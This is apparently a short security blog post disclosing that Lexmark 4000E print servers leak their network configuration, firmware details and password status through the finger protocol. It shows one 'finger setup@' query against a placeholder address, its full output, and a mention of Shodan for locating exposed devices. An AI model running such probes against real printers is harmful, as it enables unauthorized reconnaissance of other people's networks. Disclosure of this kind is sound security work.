Lexmark 4000E Remote Information Disclosure

A friend pointed out Lexmark 4000E printers (Shodan search) were responsive to commands via the old finger protocol. He also pointed out there is a blog about this and a lot more at Infobyte Security as well as a full list of commands available including some specifically for the OptraImage at India Study Channel.

df:/home/df # finger setup@1.2.3.4
[1.2.3.4/1.2.3.4]

Ethernet 10/100

Network Card
Status: Connected
Speed, Duplex: 100 Mbps, Full Duplex (Auto)
Current Date and Time: 1970-01-16 11:07
End-of-Job Timeout: 90
UAA: 0020004E195C
LAA: 000000000000
Part Number: 56P2129
EC: 5C0027
Firmware Version: LC.MD.P107
Compi: 28-Nov-06 17:27, mls-bld
Password: Not Set

USB 1
NPAP Active: Yes
NPA Mode: Auto
Printer Type: Lexmark T650

TCP/IP
Active: On
Enable DHCP: Off
Enable BOOTP: Off
AutoIP: Off
Address Source: Manual
Address: 1.2.3.4
Netmask: 255.255.255.0
Gateway: 1.2.3.1
Fully Qualified Domain Name: test.example.org
WINS Status: Unregistered
WINS Server: 0.0.0.0
Zero Configuration Name: Lexmark N4000e
df:/home/df #

Advertisements

Tags: , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: